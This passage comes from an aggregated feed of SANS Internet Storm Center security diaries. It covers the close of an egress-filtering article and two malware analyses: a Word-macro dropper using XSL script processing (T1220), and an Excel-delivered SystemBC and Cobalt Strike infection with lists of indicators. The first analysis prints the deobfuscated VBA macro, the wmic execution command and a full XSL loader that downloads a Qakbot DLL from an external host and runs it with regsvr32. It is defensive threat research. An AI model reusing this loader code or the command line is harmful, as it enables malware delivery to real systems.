  • On the plus side, you'll have started down the path of implementing the Critical Controls.  Take a closer look at them if you haven't already, there's only good things to find there :-)
  • Also on the plus side, you'll know which IP's, subnets and domains that your purchased applications reach out to
  • Just as important, or even moreso - you'll have that same information for your in-house applications.
  • Lastly, if any of your hosts or applications reach out to a new IP, it's going to blocked and will raise an alert.  If it ends up being reverse-shell or C&C traffic, you can definitively say that you blocked that traffic.  (score!)
  • Lastly-lastly - treat denied server packets as security incidents.  Make 100% sure that denying this packet breaks something before allowing it.  If you just add an "allow" rule for all denied packets, then you'll at some point just be enabling malware to do it's best.

For most organizations with less than a hundred server VMs, you can turn this into a "hour or two per day" project and get it done in a month or so.

Will this catch everything?  No you still need to address workstation egress, but that's a do-able thing too (https://isc.sans.edu/forums/diary/Egress+Filtering+What+do+we+have+a+bird+problem/18379/).  Would this have caught the Solarwinds Orion code in your environment?  Yes, parts of it - in most shops the Orion server does not need internet access at all (if you don't depend on the application's auto-update process) - even with that, it's a short "allow" list.  And if the reaction is to treat denied packets seriously, you'd have caught it well before it hit the news (this was a **lengthy** incident).  The fact that nobody caught it in all that time really means that we're still treating outbound traffic with some dangerous mindsets "we trust our users" (to not make mistakes), "we trust our applications" (to not have malware) and "we trust our server admins" (to not do dumb stuff like browse from a server, or check their email while on a server).  If you read these with the text in the brackets, I'm hoping you see that this really should be mindsets we set aside, maybe we should have done this in the early 2000's!  This may seem like an over-simplification, but really it's not - this approach really does work.

If you've caught anything good with a basic egress filter, please share using our comment form (NDA permitting of course).

Referenced Critical Controls:

CC1: Inventory and Control of Hardware Assets (all of it, if you haven't done this start with your server VLAN)
CC2: Inventory and Control of Software Assets (again, all of it, and again, start with your server VLAN for this)
CC7.6 Log all URL requests from each of the organization's systems, whether on-site or a mobile device, in order to identify potentially malicious activity and assist incident handlers with identifying potentially compromised systems.9.1 Associate active ports, services, and protocols to the hardware assets in the asset inventory.
CC9.4 Apply host-based firewalls or port-filtering tools on end systems, with a default-deny rule that drops all traffic except those services and ports that are explicitly allowed.
CC12.4 Deny communication over unauthorized TCP or UDP ports or application traffic to ensure that only authorized protocols are allowed to cross the network boundary in or out of the network at each of the organization's network boundaries.
CC12.5 Configure monitoring systems to record network packets passing through the boundary at each of the organization's network boundaries.

 

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Tuesday, February 2nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7354, (Tue, Feb 2nd)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New Example of XSL Script Processing aka "Mitre T1220", (Tue, Feb 2nd)

$
0
0

Last week, Brad posted a diary about TA551[1]. A few days later, one of our readers submitted another sample belonging to the same campaign. Brad had a look at the traffic so I decided to have a look at the macro, not because the code is heavily obfuscated but data are spread at different locations in the Word document.

The sample was delivered through a classic phishing email with a password-protected archive. It's a file called ‘facts_01.28.2021.doc’ (SHA256:dcc5eb5dac75a421724fd8b3fa397319b21d09e22bc97cee1f851ef73c9e3354) and unknown on VT at this time.

It contains indeed a macro:

remnux@remnux:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc
A: word/vbaProject.bin
 A1:       539 'PROJECT'
 A2:        89 'PROJECTwm'
 A3: m    1127 'VBA/ThisDocument'
 A4:      3687 'VBA/_VBA_PROJECT'
 A5:      2146 'VBA/__SRP_0'
 A6:       198 'VBA/__SRP_1'
 A7:       348 'VBA/__SRP_2'
 A8:       106 'VBA/__SRP_3'
 A9: M    1165 'VBA/a7JUT'
A10: M   10838 'VBA/aBJwC'
A11:       884 'VBA/dir'
A12: m    1174 'VBA/frm'
A13:        97 'frm/\x01CompObj'
A14:       286 'frm/\x03VBFrame'
A15:       170 'frm/f'
A16:      1580 'frm/o'

If looking at "M" flags in the oledump output is a key point, it's always good to have a look at all the streams. A first interesting observation is the presence of a user form in the document (see the ‘frm’ in streams 13 to 16 combined with 'm' in stream 12). 'frm' is the name that was given to the author. This can be verified by checking the document in a sandbox:

WARNING: Don't do this on a regular host!

The user form contains three elements (text boxes). Now let's have a look at the document. Macros are polluted with comments and can be cleaned by filtering them.

Stream #9 is not interesting, it just contains the AutoOpen() function which calls the real entry point:

remnux@remnux:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc -s 9 -v | grep -v "' "
Attribute VB_Name = "a7JUT"
Sub AutoOpen()
Call ahjAvX
End Sub

The real interesting one is located in the stream 10:

remnux@remnux:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc -s 10 -v | grep -v "' "
Attribute VB_Name = "aBJwC"
Function ajC1ui(auTqHQ)
End Function
Function atZhQ(aF1TxD)
atZhQ = ActiveDocument.BuiltInDocumentProperties(aF1TxD)
End Function
Function ayaXI(aa5xD, aqk4PA)
Dim aoTA6S As String
aoTA6S = Chr(33 + 1)
ayaXI = aa5xD & atZhQ("comments") & aoTA6S & aqk4PA & aoTA6S
End Function
Function acf8Y()
acf8Y = "L"
End Function
Sub ahjAvX()
axfO6 = Trim(frm.textbox1.text)
aa6tSY = Trim(frm.textbox2.text)
aqk4PA = aa6tSY & "xs" & acf8Y
aa5xD = aa6tSY & "com"
a6AyZu = Trim(frm.textbox3.text)
aYlC14 aqk4PA, axfO6
FileCopy a6AyZu, aa5xD
CreateObject("wscript.shell").exec ayaXI(aa5xD, aqk4PA)
End Sub
Sub aYlC14(aFp297, axfO6)
Open aFp297 For Output As #1
Print #1, axfO6
Close #1
End Sub

ahjAvX() is called from AutoOpen() and starts by extracting values of the user form elements: form.textbox[1-3].text

The element #3 contains “c:\windows\system32\wbem\wmic.exe”
Element #2 contains "c:\programdata\hello." (note the dot at the end)
And element #1 contains what looks to be some XML code.

Before check the XML code, let's deobfuscate the macro:

ahjAvX() reconstructs some strings and dump the XML payload into a XSL file by calling aYlC14(). Then, a copy of wmic.exe (the WMI client) is copied in "c:\programdata\hello.com". Before spawning a shell, more data is extracted from the document via atZhQ():

Function atZhQ(aF1TxD)
atZhQ = ActiveDocument.BuiltInDocumentProperties(aF1TxD)
End Function

The document comments field contains the string "pagefile get /format:"

By the way, did you see the author's name?

With the extracted comments field, here is the function that executes the XSL file:

Function ayaXI(aa5xD, aqk4PA)
  Dim aoTA6S As String
  aoTA6S = Chr(33 + 1)
  ayaXI = aa5xD & atZhQ("comments") & aoTA6S & aqk4PA & aoTA6S
End Function

The reconstructed command line is:

c:\programdata\hello.com pagefile get /format: "c:\programdata\hello.xsl"

We have here a perfect example of a dropper that dumps an XSL file on the disk and executes it. This technique is referred as T1220 by Mitre[2]. Let's now have a look at the XSL file:

<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="https://microsoft.com/xxx">
<msxsl:script language="VBScript" implements-prefix="user">
<![CDATA[
Function aOLsw()
  Set xmlhttp = CreateObject("msxml2.xmlhttp")
  xmlhttp.open "GET", "http://fbfurnace6.com/assets/4621f42aad9738c0992/e93f49079ac08560/67311dcc4b7a6/shaz10?pr=5dc7155&rccks=4cc00761&kp=d909e4b6e097ed", false.
  xmlhttp.send
  If xmlhttp.Status = 200 Then
    Set stream = CreateObject("adodb.stream")
    stream.Open
    stream.Type = 1
    stream.Write xmlhttp.ResponseBody
    stream.Position = 0
    stream.SaveToFile "c:\programdata\41401.jpg", 2
    stream.Close
  End if
End Function
]]>

</msxsl:script>
<msxsl:script language="VBScript" implements-prefix="user">
<![CDATA[
]]>
</msxsl:script>

<msxsl:script language="VBScript" implements-prefix="user">
<![CDATA[
Function awyXdU(aLYgv, aCdvO, atYdl)
  Call aOLsw
  Set aKLoby = CreateObject("wscript.shell")
  With aKLoby
    .exec "regsvr32 c:\programdata\41401.jpg"
  End With
  awyXdU = 1
End Function
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:awyXdU('', '', '')"/>
</xsl:template>
</xsl:stylesheet>

The function awyXdU() is the entry point of this XSL file. It calls aOLsw() to download the malicious Qakbot DLL, dumps it on the disk, and executes it with regsvr32. XSL files are not new but it has been a while since I did not spot one. Didier already mentioned them in a previous diary around 2019[3].

[1] https://isc.sans.edu/forums/diary/TA551+Shathak+Word+docs+push+Qakbot+Qbot/27030/
[2] https://attack.mitre.org/techniques/T1220/
[3] https://isc.sans.edu/forums/diary/Malicious+XSL+Files/25098

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Excel spreadsheets push SystemBC malware, (Wed, Feb 3rd)

$
0
0

Introduction

On Monday 2021-02-01, a fellow researcher posted an Excel spreadsheet to the Hatching Triage sandbox.  This Excel spreadsheet has a malicious macro, and it uses an updated GlobalSign template that I hadn't noticed before (link for the sample).

This Excel spreadsheet pushed what might be SystemBC malware when I tested it in my lab environment on Monday 2021-02-01.  My lab host was part of an Active Directory (AD) environment, and I also saw Cobalt Strike as follow-up activity from this infection.

Today's diary reviews this specific instance of (what I think is) SystemBC and Cobalt Strike activity from Monday 2021-02-01.


Shown above:  Flow chart from the SystemBC infection on Monday 2021-02-01.

Infection Path

I didn't know where these spreadsheets were coming from when I investigated this activity on Monday 2021-02-01.  By Tuesday 2021-02-02, several samples had come into VirusTotal showing at least 20 spreadsheets that were contained in zip archives.  These appear to have been attachments using emails as a distribution method.  Unfortunately, I couldn't find any emails submitted to VirusTotal yet that contained one of the zip archives.


Shown above:  Screenshot from one of the spreadsheets.

Spreadsheet macro grabs SystemBC malware

Enabling macros on a vulnerable Windows host caused HTTPS traffic to grab a Windows executable (EXE) file for SystemBC malware.  This EXE was stored and run from new directory path created under the C:\ drive as shown below.


Shown above: SystemBC malware saved to the infected Windows host.

This EXE file was made persistent on the infected host through a scheduled task.


Shown above:  Scheduled task to keep the malware persistent.

SystemBC post-infection traffic

The first post-infection traffic caused by SystemBC was TCP traffic to 109.234.39[.]169 over port 4001 as shown below.


Shown above:  SystemBC traffic over TCP port 4001.

Next was HTTP traffic to the same IP address over TCP port 80 that returned obfuscated text containing code to start the Cobalt Strike activity.


Shown above:  HTTP traffic caused by SystemBC that returned code for Cobalt Strike.

Cobalt Strike traffic

Cobalt strike activity consisted of HTTPS traffic and DNS activity focused on the domain fastonent[.]com.


Shown above:  Cobalt Strike activity from the infection.


Shown above:  Alerts from the traffic using Squil in Security Onion with Suricata and the ETPRO ruleset.

Indicators of Compromise (IOCs)

SHA256 HASHES OF 20 ZIP ARCHIVES WITH THE 20 EXCEL FILES THEY CONTAIN:

- 31a04fe64502bfe6f73971f9de9736402dd9a21a66d41d3a4ecea5ee18852f1c  documentation-82.zip
- a54b331832d61ae4e5a2ec32c46830df4aac4b26fe877956d2715bfb46b6cb97  Document21467.xls

- ce02ed48d9ab12dfe2202c16f1f272f75e5b1c0b64e48e385ca71608cb686fc8  documentation-17.zip
- 62f1ef07f7bab2ad9abf7aeb53e3a5632527a1839c3364fbaebadd78d6c18f4e  Document13160.xls

- 4dfb0bb69a07f1cd7b46198b5edf8afebd0cdd02f27eb2c687447f692625fb9f  contract-86.zip
- 59bbcecd3b1670afc5430e3b31377f24da24f4e755b7c563a842ce4e325aa61a  Document24071.xls

- c3a38df6f4864d32c10e8ecf063e18cba56c3b1add3404634ea20ea109198620  agreement-92.zip
- 8ef917da85afcc5f7bfe9cc2afd29f44a7f0cda5ba0249b50ef448d547007461  Document1525.xls

- 3a181036cdc46e088f1cb98acd06062d32a8a11a8ef65fe7544bb22a2fd5c56e  information-94.zip
- 387bdfedc306e087d8ceceb1f1f8f7a6b3c32110ca3d7273eb01e474349d1974  Document10668.xls

- 244625f6627cadadb7faf8a6b526e91aee4f5c1cadfa1c0d4fb996f4cc60a5ae  documentation-18.zip
- 17ed4dc4369a90d2e24f1ab0fa1eeb6fca61f77b183499c47e5cfb9ce12130fb  Document7833.xls

- cca4a3c8af9b549b445b7e2bcb2d45b95982890b6ed3b62fc882f0478f512b2f  agreement-44.zip
- f682f0756ec96d262ae4c48083d720657685d9b56278bd07b2656f3b33be985e  Document1047.xls

- dcff925d51e90586eb624f249e56b6abb7026b364fab84dcfcf44025e84ff7d9  DOCUMENT-30.zip
- 2e726c5a27e04633d407e13bd242ae71865eef13ac78bf9068e1200823e5ea81  Document15758.xls

- dc5a3675455d9486e7aa8aaf2463b69ad03c508375eb99b6fb3039d914677a9f  information-94.zip
- 6c0ef43c1f8b4425d034a46812903b8a6345ae24e556e61e37c0f14eba8c8d2e  Document15979.xls

- 7d1602138a26c0524b32570f3fb292fd5a7efbc5ed53ae260d7b7f3652a78969  documentation-83.zip
- b4107daacbbfac1b9bc9b3fa4e34a8d87037fa2c958db9d6d7df52380f15a1d1  Document16000.xls

- 0fb4d8ac3cdef038bf53c8f4269eef5845704a9e962b7609fd93a9f08cc2fab1  documentation-48.zip
- ff483bbb98d02d1e071d6f0e8f3a3c1706c246db71221455b29f4e54b0c4ef2f  Document29060.xls

- 0cf4fff7f96cf695d3476e7dc66794d067acafbd2980f69526b874fc5b4c08be  docs-62.zip
- 441f076519f0bdc04d110b4fa73dbafa3b667825ceab6d4099e36714bd1d7213  Document5804.xls

- 056911f208c9b475020627b83c8bf3a0151e30ec7f71113cf75abb950a431efc  answer-46.zip
- 795a5d5c57dac1703c6b4bab9507d1c662180716b4afa89c261aa3bb6d164e2f  Document10660.xls

- 31901336fdfae4fdeac46b937a059c618d5ba3e04d06bb8e95108a307e2c6d94  DOCUMENT-74.zip
- b2aa3ee1cc617f90e92664969a0856d98a97c727edd7c81ef83c038a34a432d5  Document4083.xls

- e06ee4e0bbe581edc39aecaab76e3fa12a53cb971ec0c106644703b376f5ed24  reaction-32.zip
- a3ce1043a7791b73fe14d7c29377467fd64df3b3b464c48a22a6d3bd2f7786aa  Document18681.xls

41 OTHER EXCEL FILES WITH THE SAME DOCUMENT TEMPLATE:

- 044494acb6d781e6cc3b9a837b7ebca1e933080fe384a874f5eb9cca1ea76a55  DOCUMENT-99.xls
- 071809d68b777cae171284c2cc289b455a778b1f054cd0f244cf0fb6053dae2d  documentation-47.xls
- 0e094197fca1947eb189006ddeb7d6ad9e5d1f58229e929bc0359887ed8a667d  agreement-84.xls
- 134a5bfe06f87ace41e0e2fb6f503dca0d521cb188a0c06c1c4bc734ad01e894  Document5201.xls
- 13ef189260cd344e61a0ad5907c5e695372b00fe1f5d5b2b3e389ad2b99b85e4  documentation-32.xls
- 17fb4271ab9113a155c091c7d7bd590610da87e986ccf5962aa7fc4b82060574  SG_information-24.xls
- 19065d8aa76ba67d100d5cb429a8b147c61060cc49905529d982042a55caceef  agreement-26.xls
- 1b63ff13d507f9d88d03e96c3ef86c7531da58348f336bc00bf2d2a2e378fd90  documentation-63.xls
- 1d8fd79934dc9e71562e50c042f9fa78a93fa2991d98c33e0b6ab20c0b522d5a  required-47.xls
- 1e295b33d36dee63930728349be8d4c7b8e5b52f98e6a8d9ca50929c8a3c9fb1  contract-52.xls
- 2156a9f3d87d3df1cee3f815f609c2a3dc2757717ff60954683c34794e52b104  document-85.xls
- 21db2f562b9182a3fcdb0fce8c745b477be02b4a423a627cddf6a1c244b6c415  DOCUMENT-64.xls
- 2f66e8d84e87811feaf73e30b08be0ad6381271ddfb5071556bd26cd3db2c3f4  documents-74.xls
- 32452e930a813f41a24dc579a08e8dde1801603797d527ce1385ad414b00e676  Document9330.xls
- 32a904d301e8a30b7bd70804b905dd7b858b761979f3344bc2ec3bff0cb6d703  DOCUMENT-64.xls
- 3dcd7897ad927f4b2b860010963e02903bc68a2c0c86abb1a27b8cbaab2fa9b6  document-91.xls
- 418460bf69c01e47cbe261d7f7312475cda4305860fbbe3d3e6639b9adb78de5  Document8107.xls
- 49cb79f8547c9c94a7ab6642ba1c40fcd036625f71845f2c6203d76c5f7f46fb  documents-44.xls
- 4af6e8805273ca9b3dea793bd712ed785ea5c5ed9e387cb8ab5059a4f364a303  docs-49.xls
- 584c2aab3fe9e1ec9f9dffecbd32e6af8b6b3fa3141c7ddf845763cbf14a82eb  DOCUMENT-30.xls
- 5cecb7e104e73aa9916a7154a3004d1a71c59c8f473d693f3b285b2fd473e454  documentation-66.xls
- 669de92b909247d676daa6bab3b3ae5be4fbec2e77f66915267f032c1d7eb71a  agreement-50.xls
- 6bf9612a2b8288d55b47648f9ad9ee80cca5058ced5fb77254e57f9ff2d701d3  contract-38.xls
- 6df34ffeffb9cc5def3c424cd8bb0f90ab921be24efd1f8fe52ea6c13e700334  data-65.xls
- 8072f20dd769519a621255307b03e85dca2fe227f48486b0aacc41903ab3bfdf  Document12611.xls
- 8eb429c24872a501fafc783e8a0fcc53e0ebb5cc8ec4f2310fc10102b1d23a27  contract-90.xls
- 908cb8f6f39b9c310d8df54bddf667d23b0851bbf90b21ca89ea69d211f2c402  Document21461.xls
- 9519a0631804d18f95d4c3239df5e5ea56b8e5a890b73c889a58d6469958eb71  Document11622.xls
- 952ec18a6dc949ebd335f5eabed756d0f562aa3853fe9384dc0eded0de5f843b  required-36.xls
- a274a08d84958666b6c94e1a6fc3b676aca387544a4218c8473e1a9a72124532  documentation-45.xls
- a7b362864724ccb5cba416ff45b4e137f22f8fed4492b5521e369026107031b2  Document9470.xls
- ab9b97d0d17b2434d2cfc66106ae07b903271ba603be1314b742338c23cce20c  docs-72.xls
- c4d745576b47b6dd79a9d92cda7dbe60c2cda7d8960a07e33692e6e71f8e5eb3  document-78.xls
- c8fd542a9b500ada7afbff26b6c11dd2ab22aaefd30ef7a999410ee20d2fb043  answer-69.xls
- d0c96aacb07629b9d97641a0022b50827f73d86a34fa4929b126f398cf4cf486  Document21265.xls
- d3145f4f7b1c62f9a1937aa9e968da8b52ff4fde83c0dba3152567b2b65d809a  documentation-49.xls
- d4e372014a40821f10780fcc12c6b5a1cdf4740738a0769e78f06dd10b6ec53f  daret.xls
- d85eb8e5c39d7681155e39602ce30e0c3793b4513f1038e48334296db945e02d  documentation-29.xls
- e26ab2d6cff95ba776ec6e7beb8c70f2e4d79467b71153ddb36177cb2b2a1273  Document4677.xls
- e64d605e857900a07c16e22e288c37355e4ebd6021898268ab5dded5c8c4efca  documentation-99.xls
- f5e2351ff528c574dc23c7ef48ddac42546c86d77c28333b25112a9efbfb9d93  Document18108.xls

AT LEAST 7 URLS GENERATED BY EXCEL MACROS FOR A MALWARE PAYLOAD:

- hxxps://alnujaifi-portal[.]com/ds/3101.gif
- hxxps://clinica-cristal[.]com/ds/3101.gif
- hxxps://eyeqoptical[.]ca/ds/3101.gif
- hxxps://gbhtrade.com[.]br/ds/3101.gif
- hxxps://newstimeurdu[.]com/ds/3101.gif
- hxxps://remacon[.]net/ds/3101.gif
- hxxps://skconstruction[.]info/ds/3101.gif

MALWARE PAYLOAD EXAMPLE (SYSTEMBC EXE):

- SHA256 hash: 61499704920ee633ffb2baab36eb8eb70d5e0426bca584f9a4a872e4b930c417
- File size: 243,200 bytes
- File location: C:\BlockSt\Uptqeodk\wineditor.exe

SYSTEMBC TRAFFIC:

- 109.234.39.169 over TCP port 4001 - encoded/encrypted data
- 109.234.39.159 over TCP port 80 - GET /systembc/[24 ASCII characters representing hex string].txt

COBALT STRIKE ACTIVITY:

- 192.169.6.8 over TCP port 443 - no domain - HTTPS traffic
- 192.169.6.8 over TCP port 443 - fastonent[.]com - HTTPS traffic
- 192.169.6.8 over TCP port 8080 - fastonent[.]com - HTTPS traffic
- DNS queries/responses for various domains ending with .dns.fastonent[.]com


Final words

I'm not 100 percent sure this malware is SystemBC, but HTTP traffic caused by the EXE has /systembc/ in the URL, so I'm calling it SystemBC until someone identifies it as another malware family.

When I ran the spreadsheet on a stand-alone host, I only saw SystemBC traffic over TCP port 4001.  I didn't see the Cobalt Strike traffic until I infected one of my lab hosts within an AD environment.  This reflects a trend I've noticed with at least one another malware family (Hancitor), where Cobalt Strike doesn't appear unless the infected host is running in an AD environment.

A pcap of the infection traffic and and malware from the infected Windows host can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Wednesday, February 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7356, (Wed, Feb 3rd)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Viewing all 8242 articles
Browse latest View live